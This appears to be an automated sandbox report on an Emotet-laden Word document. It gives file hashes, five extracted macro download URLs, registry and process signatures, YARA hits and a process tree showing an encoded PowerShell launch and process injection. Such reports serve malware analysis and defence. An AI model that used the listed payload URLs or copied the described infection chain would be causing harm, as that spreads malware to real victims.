Analysis
max time kernel: 139s
max time network: 134s
platform: windows10_x64
resource: win10v200722
submitted: 28-07-2020 19:21
Static task: static1
Behavioral task: behavioral1
Sample: emotet_e3_8b8a580cd020e0bd0471666b6354c24211f043403e1924ae8ae94c1b0a630c28_2020-07-28__192059._doc.doc
Resource: win7
General
Target: emotet_e3_8b8a580cd020e0bd0471666b6354c24211f043403e1924ae8ae94c1b0a630c28_2020-07-28__192059._doc.doc
Size: 169KB
MD5: ddad3a37c0baf5a29ca82714192d633a
SHA1: abf92157c3674f7523669579fb83b2936de887b9
SHA256: 8b8a580cd020e0bd0471666b6354c24211f043403e1924ae8ae94c1b0a630c28
SHA512: 68bfa0abca5e93d43be987277469f643a89159e2d10fc31bbbe507486f02555151417ce8c29fffa51024e7cd039a7854992be34823ef68762b21bf828a36062c
Malware Config
Extracted (macro download URLs):
http://w3art.com/dtla/bBmTEkbPK/
http://www.stempora.com/@mer/ybV/
http://sundaystudio.net/cgi-bin/bzsvy9778486/
http://sujest.com/BL/nQsQRv/
http://studiotoybox.com/common/qezZSZB/
Extracted (family: emotet), C2 endpoints as IP:port:
Signatures

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: WINWORD.EXE
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: powersheLL.exe
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3460 | 816 | powersheLL.exe | (not recorded)
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes: powersheLL.exe
description | pid | process
Token: SeDebugPrivilege | 3460 | powersheLL.exe
Executes dropped EXE (2 IoCs)
Processes: 920.exe, Windows.ApplicationModel.LockScreen.exe
pid | process
3980 | 920.exe
3372 | Windows.ApplicationModel.LockScreen.exe
Blacklisted process makes network request (1 IoC)
Processes: powersheLL.exe
flow | pid | process
17 | 3460 | powersheLL.exe
Suspicious use of WriteProcessMemory (3 IoCs)
Processes: 920.exe
description | pid | process | target process
PID 3980 wrote to memory of 3372 | 3980 | 920.exe | Windows.ApplicationModel.LockScreen.exe (same row recorded 3 times)
Emotet Payload (2 IoCs)
Detects Emotet payload in memory.
resource | yara_rule
behavioral2/memory/3980-10-0x00000000005B0000-0x00000000005BC000-memory.dmp | emotet
behavioral2/memory/3372-13-0x0000000000700000-0x000000000070C000-memory.dmp | emotet
Drops file in System32 directory (1 IoC)
Processes: 920.exe
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\KBDIC\Windows.ApplicationModel.LockScreen.exe | 920.exe
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: WINWORD.EXE
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Suspicious use of SetWindowsHookEx (13 IoCs)
Processes: WINWORD.EXE, 920.exe, Windows.ApplicationModel.LockScreen.exe
pid | process
4028 | WINWORD.EXE (9 hits)
3980 | 920.exe (2 hits)
3372 | Windows.ApplicationModel.LockScreen.exe (2 hits)
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes: WINWORD.EXE
pid | process
4028 | WINWORD.EXE (2 hits)
Suspicious behavior: EnumeratesProcesses (7 IoCs)
Processes: powersheLL.exe, Windows.ApplicationModel.LockScreen.exe
pid | process
3460 | powersheLL.exe (3 hits)
3372 | Windows.ApplicationModel.LockScreen.exe (4 hits)
Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (tree depth 1)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_8b8a580cd020e0bd0471666b6354c24211f043403e1924ae8ae94c1b0a630c28_2020-07-28__192059._doc.doc" /o ""
- Enumerates system info in registry
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID: 4028

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe (tree depth 1)
Command line: powersheLL -e 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
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID: 3460

C:\Users\Admin\920.exe (tree depth 1)
Command line: C:\Users\Admin\920.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID: 3980

C:\Windows\SysWOW64\KBDIC\Windows.ApplicationModel.LockScreen.exe (tree depth 2)
Command line: "C:\Windows\SysWOW64\KBDIC\Windows.ApplicationModel.LockScreen.exe"
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
PID: 3372